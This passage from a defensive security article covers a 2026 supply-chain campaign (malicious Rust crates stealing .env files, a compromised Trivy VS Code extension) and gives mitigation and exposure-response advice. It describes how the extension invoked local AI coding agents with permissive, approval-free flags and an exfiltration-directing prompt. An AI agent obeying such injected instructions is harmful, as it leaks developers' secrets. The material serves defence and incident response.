For teams running AI-assisted CI pipelines, the Ambient Code case in this campaign is instructive. Claude Code's review blocked the malicious pull request in roughly 82 seconds — not because it was scanning for known malicious code, but because it evaluated the pull request's intent and identified it as adversarial. That is a different detection layer than static analysis, and it operates upstream of execution. Whether or not your team uses AI for code review, the general principle applies: detection needs to move to the point where intent can be evaluated, not just after artifacts have been produced.
Build a Dependency Ingestion Policy, Not Just a Dependency Audit Schedule
Scheduled dependency audits are retrospective. An ingestion policy is prospective: it defines the conditions under which a new dependency can enter your codebase at all, before the pull request merges. The conditions can be lightweight — minimum download count, minimum age, at least one published version before the one being installed, no build-time network access — and enforced automatically through CI checks rather than manual review.
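The lightweight conditions above reduce to a pure policy function that CI can run before the merge. The metadata fields below are a simplified stand-in loosely modeled on what crates.io exposes, and the thresholds are placeholders to tune per organization.

```python
from datetime import datetime, timezone

# Illustrative thresholds; tune per organization.
MIN_DOWNLOADS = 1000
MIN_AGE_DAYS = 30
MIN_PRIOR_VERSIONS = 1

def ingestion_violations(meta: dict, now: datetime) -> list[str]:
    """Check crate metadata against the ingestion policy and return the
    list of violated conditions (empty means the crate may enter).
    `meta` is a simplified dict; field names are modeled loosely on the
    crates.io API response, not guaranteed to match it exactly."""
    violations = []
    if meta["downloads"] < MIN_DOWNLOADS:
        violations.append("download count below threshold")
    if (now - meta["created_at"]).days < MIN_AGE_DAYS:
        violations.append("crate younger than minimum age")
    if meta["prior_versions"] < MIN_PRIOR_VERSIONS:
        violations.append("no published version before this one")
    return violations

now = datetime(2026, 3, 1, tzinfo=timezone.utc)
# A days-old crate with a dozen downloads and no prior release fails all three checks.
brand_new = {"downloads": 12,
             "created_at": datetime(2026, 2, 25, tzinfo=timezone.utc),
             "prior_versions": 0}
print(ingestion_violations(brand_new, now))
```

A CI step that fails the pull request on any non-empty result enforces the policy automatically, which is the point: the decision happens before the dependency enters the codebase, not at the next scheduled audit.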
cargo deny supports policy enforcement for Rust, including license checks, banned crate lists, and duplicate dependency detection. Combined with cargo audit for known RustSec advisories and a behavioral pre-install tool for new additions, this gives you three independent layers that each catch different things: cargo audit catches known-bad; cargo deny enforces organizational policy; behavioral analysis catches unknown-bad that is currently live. Running all three in CI, blocking on failures rather than reporting them, means a malicious crate does not reach a developer machine — it fails the pipeline first.
Restrict Outbound Network Access in Build Environments at the Infrastructure Level
The exfiltration in both campaigns — the Rust crate POST to timeapis[.]io and the AI agent data push through GitHub or scattered communication channels — required outbound network access from the build or development environment. Restricting that access at the infrastructure level, not through application-layer controls, removes the entire class of exfiltration technique rather than addressing individual malware families.
In practice this means: egress filtering on CI runners that allows only explicitly whitelisted domains; network policies in Kubernetes-based build environments that deny all outbound traffic except to defined registries and artifact stores; and for developer machines in high-sensitivity environments, DNS-layer filtering that flags or blocks connections to newly registered domains. timeapis[.]io was a typosquat of a legitimate service. A DNS resolver that blocks or alerts on domains registered within the past 30 days would have interrupted the exfiltration regardless of whether the malicious crate was detected before installation.
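The 30-day heuristic reduces to a one-line check once a registration date is in hand. A minimal sketch; in practice the date would come from WHOIS/RDAP lookups or a DNS security provider's feed rather than being passed in directly.

```python
from datetime import datetime, timezone, timedelta

NEW_DOMAIN_WINDOW = timedelta(days=30)

def is_newly_registered(registered_at: datetime, now: datetime) -> bool:
    """True if the domain falls inside the blocking window. The
    registration date is a parameter here; a real resolver policy
    would obtain it from WHOIS/RDAP or a threat-intel feed."""
    return now - registered_at < NEW_DOMAIN_WINDOW

now = datetime(2026, 3, 1, tzinfo=timezone.utc)
# A typosquat domain registered days before a campaign would be blocked.
print(is_newly_registered(datetime(2026, 2, 20, tzinfo=timezone.utc), now))  # True
# A long-lived legitimate domain passes.
print(is_newly_registered(datetime(2019, 6, 1, tzinfo=timezone.utc), now))   # False
```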
StepSecurity's Harden-Runner implements egress filtering specifically for GitHub Actions, allowing workflow-level network policies without requiring infrastructure-level changes to GitHub's runner environment. For self-hosted runners, network-level egress controls are achievable through standard firewall rules or cloud security group policies.
What to Do If You Were Exposed
If you downloaded any of the five malicious Rust crates while they were live, treat your environment as potentially compromised regardless of whether you can confirm the exfiltration code path was executed. The recommendations from Socket apply directly:
- Assume possible exfiltration and rotate all API keys, tokens, cloud credentials, GitHub tokens, SSH keys, and any secrets stored in .env files that were accessible on the affected machine.
- Audit all CI/CD jobs that ran with publish or deploy credentials during the exposure window.
- Restrict outbound network access in build and test phases where feasible.
- Run cargo audit and cargo deny against your dependency trees to check for RustSec advisories.
If you installed the Trivy VS Code extension, version 1.8.12 or 1.8.13, from Open VSX, the additional steps are:
- Uninstall the affected extension immediately and verify your current installed version.
- Check your GitHub account for unexpected repositories, particularly one named posture-report-trivy.
- Review your shell history for invocations of claude, codex, gemini, copilot, or kiro-cli with the permissive flags listed above.
- Rotate all credentials that were accessible on the machine during the February 27–28, 2026 exposure window.
- If AI agent logging is enabled in your local tools, review those logs for automated prompts you did not initiate.
The Registry Transparency Question
One week before the five malicious Rust crates were published, crates.io changed how it communicates malware removals to the community. In a February 13, 2026 post, the crates.io team announced it would stop publishing a blog post each time a malicious crate is detected and removed. The new policy routes those notifications exclusively through RustSec advisories — a database that developers must actively monitor, rather than one that surfaces in general developer news feeds. The rationale was reasonable: in the vast majority of prior cases, the removed crates had shown no evidence of real-world downloads, and the blog posts were generating noise rather than signal. Crates that see actual usage or active exploitation will still receive both a blog post and a RustSec advisory.
The timing is notable context for this campaign. chrono_anchor — the most sophisticated of the five crates, the one still live when Socket flagged it — was the kind of package the new policy was designed to treat differently: it had a live publisher account, obfuscated logic, and was still available for installation. It received the full response. The four simpler crates, removed quickly with no confirmed downloads, would under the new policy generate a RustSec advisory entry and nothing more.
Whether that threshold is correctly calibrated is a legitimate question. The crates.io team's judgment is that low-download, quickly-removed packages do not warrant ecosystem-wide noise. The counterargument is that the absence of visible download counts is not the same as the absence of impact — a crate installed into a single high-value CI pipeline leaves no public download trace proportional to its damage. Developers who rely on blog posts and security newsletters to stay current on package ecosystem threats will see less of this pattern under the new policy. Those who subscribe to the RustSec RSS feed will see it all.
There is a related question the new policy does not address and that the campaign itself makes visible: what is the correct way to count a download when the installation happens inside an automated CI pipeline that runs hundreds of times a day? A developer who adds a malicious crate to a monorepo build may register one install on the developer's machine. The CI system may then execute that same crate against hundreds of build jobs, none of which generate a distinct download event on the registry side. The download count on crates.io reflects registry pulls, not executions. A crate pulled once to a build cache and run a thousand times against production pipelines looks identical in the registry record to a crate pulled once and never used.
This means that download count — the signal both the old notification policy and the new one use to distinguish high-impact removals from low-impact ones — is a poor proxy for the actual question, which is whether the crate executed in a context where it could cause damage. No registry currently tracks execution context. The crates.io team's threshold calibration is reasonable given the data available; it is also working with the wrong metric. What a policy based on real-world impact would require is visibility that no public package registry has yet built.
Key Takeaways
- Low complexity does not mean low impact. None of these techniques required zero-day exploits or nation-state tooling. Typosquatted package names, a misconfigured GitHub Actions workflow trigger, and a stolen token from a former employee were sufficient to reach the build pipelines of major open-source projects.
- The .env file is the prize. Attackers know that developers store production secrets in environment files because it is convenient and keeps credentials out of source control. Any malicious dependency that executes during a build gets a chance to harvest those secrets. Treat every new dependency as having read access to your environment variables until proven otherwise.
- pull_request_target is a dangerous default. GitHub's pull_request_target trigger runs workflow code in the context of the base repository, with access to secrets, when triggered by a fork's pull request. Organizations with public repositories should audit all workflows using this trigger and restrict which conditions allow it to run with elevated permissions.
- AI coding agents expand the attack surface of every tool that can invoke them. The Trivy extension compromise introduced a new attack pattern: using a malicious VS Code extension to invoke locally installed AI agents with full-filesystem permissions and no human approval required. As AI coding assistants become standard developer tooling, any compromised extension, plugin, or dependency that can call them inherits their reach into the developer's environment.
- The Open VSX enforcement window opened the month after this attack. The Eclipse Foundation announced in January 2026 that February would be an observation-only period for new pre-publication security scanning, with enforcement — including automatic quarantine of extensions that trigger alerts — beginning in March 2026. The malicious Trivy extensions were published on February 27 and 28. Whether that timing was coincidental or deliberate is unknown. What is documented is that the attack used a publisher token belonging to a former employee to authenticate as a legitimate namespace, not a new or unknown publisher. Pre-publication scanning for injected secrets would not automatically have caught a token-authenticated upload from an established namespace. Enforcement and revocation of stale publishing credentials are separate problems, and the Open VSX incident illustrates that solving one does not solve the other.
- Natural-language prompts are a new class of malicious payload. Traditional software composition analysis tools look for suspicious function calls, hardcoded IPs, and known malware signatures. A 2,000-word natural-language prompt instructing an AI agent to act as a forensic investigator and exfiltrate data through every available channel does not match those signatures. This mirrors the logic behind social-engineering attacks like ClickFix — the payload is instructions, not executable code — and detection tooling needs to evolve accordingly.
Socket's summary of the Rust crate campaign is worth holding onto as a general principle: low-complexity supply chain malware can still deliver high-impact outcomes when it executes inside developer workspaces and CI jobs. The controls that matter are the ones that stop malicious dependencies before they run. Scanning packages for behavioral anomalies before installation — not just checking name hashes and download counts — is the layer that catches these campaigns while they are still live.
Sources: Kirill Boychenko, Socket Threat Research Team, 5 Malicious Rust Crates Posed as Time Utilities to Exfiltrate .env Files, socket.dev, March 10, 2026. Peter van der Zee and Philipp Burckhardt, Socket, Unauthorized AI Agent Execution Code Published to OpenVSX in Aqua Trivy VS Code Extension, socket.dev, March 2, 2026. Ravie Lakshmanan, Five Malicious Rust Crates and AI Bot Exploit CI/CD Pipelines to Steal Developer Secrets, The Hacker News, March 11, 2026. StepSecurity, hackerbot-claw GitHub Actions Exploitation, stepsecurity.io, 2026. GitHub Security Advisory GHSA-8mr6-gf9x-j8qg (CVE-2026-28353), aquasecurity/trivy-vscode-extension.